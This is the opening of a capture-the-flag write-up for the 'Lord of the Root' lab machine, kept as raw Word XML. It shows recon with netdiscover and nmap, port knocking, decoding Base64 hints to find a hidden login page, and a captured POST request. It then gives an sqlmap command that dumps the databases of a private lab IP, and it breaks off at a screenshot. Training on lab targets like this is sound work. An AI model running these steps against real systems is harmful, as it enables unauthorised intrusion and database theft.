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A30D9" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:pict w14:anchorId="469BCD69">
          <v:rect id="_x0000_i1138" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360B8F2" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LORD OF THE ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A3D3A9" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Hello everyone,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBD9A1" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">My friends [ </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008D29BE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Osama</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="008D29BE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>A.Essam</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="008D29BE">
        <w:t>, Ammar ] and I collaborated on this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D8CA28" w14:textId="4E93DDAF" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62240D09" wp14:editId="5D84E6B7">
            <wp:extent cx="5943600" cy="5943600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5759114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ED0441D" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Let’s Hack the planet!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D1CF5F" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:pict w14:anchorId="1C14EE95">
          <v:rect id="_x0000_i1140" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D4A40" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Let’s get Started: Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE651D0" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">The first thing we need is the </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MAC address</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> to determine the IP address of the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD8D39" w14:textId="48213E0A" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A119B93" wp14:editId="2A48DBB3">
            <wp:extent cx="5943600" cy="3826510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="70533506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26510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7FBCDD" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">To find the IP address, we’ll use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D5F8D" w14:textId="7FAE6EFF" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="408A4140" wp14:editId="7D8C0526">
            <wp:extent cx="5943600" cy="2005330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128959867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05330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7620A" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>The IP is: 192.168.1.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08EDDA" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Next, we’ll run an Nmap scan on the target machine to identify its IP address and any services it may be running. We use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A99A455" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> -p- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> 192.168.1.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13420615" w14:textId="4E971833" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F60ED7" wp14:editId="04C682DD">
            <wp:extent cx="5943600" cy="1746250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="9361958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46250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F005C1" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Only the SSH port is open, so let’s attempt to log in using SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119AACF" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>ssh 192.168.1.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA9E0A" w14:textId="6609BB01" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04A418BD" wp14:editId="5EE3D907">
            <wp:extent cx="5943600" cy="1866265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="96467726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66265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DD37A" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">Our first hint involves port knocking (ports 1, 2, 3). Let’s use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>knockit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB6D440" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>python Knockit.py 192.168.1.35 1 2 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F9686E" w14:textId="25B8F6DB" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2655BAD7" wp14:editId="361D8661">
            <wp:extent cx="5943600" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13866641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2927FAE3" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>We’ll scan again with Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD08F68" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> -p- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> 192.168.1.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A8AC8" w14:textId="3C5824A4" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41ED9C14" wp14:editId="6298C691">
            <wp:extent cx="5943600" cy="1852295"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1102688633" name="Picture 3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88633" name="Picture 32" descr="A screen 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52295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="264AFA31" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">Nice! We discovered a new port: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1337</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256CF3FB" w14:textId="41B08008" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53897A2A" wp14:editId="136FC3A0">
            <wp:extent cx="5943600" cy="3732530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="61973340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32530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD8B747" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Looks like it’s time to “take the ring to Mordor” together!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC097E" w14:textId="15669912" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C20815C" wp14:editId="1D851440">
            <wp:extent cx="5943600" cy="2967990"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="11354418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noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B04F36D" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>oooh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t> , it’s works , looking at the source code .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB6F78" w14:textId="6C11351E" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="660F9A09" wp14:editId="7778B052">
            <wp:extent cx="5943600" cy="2081530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66962068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81530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F02464" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">Examining the source code, we find something resembling a Base64-encoded string. Let’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>decode it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0C2FA" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>hURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> -b THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E34E8EE" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>It provides us with a lead, so let’s decode another string:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED8D2E5" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>hURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> -b Lzk3ODM0NTIxMC9pbmRleC5waHA=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F6C43" w14:textId="51F716A7" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F952F85" wp14:editId="381D2A93">
            <wp:extent cx="5943600" cy="2310130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20970133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10130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="038934B7" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>That appears to reveal a promising endpoint on our target site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B7F2F3" w14:textId="432C9212" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194D02DF" wp14:editId="7C938A46">
            <wp:extent cx="5943600" cy="2693670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2092472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93670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F01D08" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Finally, something to hack!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E96A40F" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">We’ll save the entire HTTP request to a file named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>MEDO.req</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> and run it through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3420995C" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>POST /978345210/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> HTTP/1.1  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Host: 192.168.1.35:1337  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Content-Length: 42  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Cache-Control: max-age=0  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Upgrade-Insecure-Requests: 1  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Origin: http://192.168.1.35:1337  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">: http://192.168.1.35:1337/978345210/index.php  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">, deflate, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>en-US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">=0.9  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Cookie: PHPSESSID=vdf9amhf2s9d1vebius83r2b56  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">Connection: keep-alive  </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t>username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>admin&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>password&amp;submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>=Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A823F4" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">To use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>, we run :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A783710" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>MEDO.req</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> --dump --flush-session --batch --level=5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E5181C" w14:textId="22B241F7" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A73DABC" wp14:editId="188ADFA3">
            <wp:extent cx="5943600" cy="4930140"/>
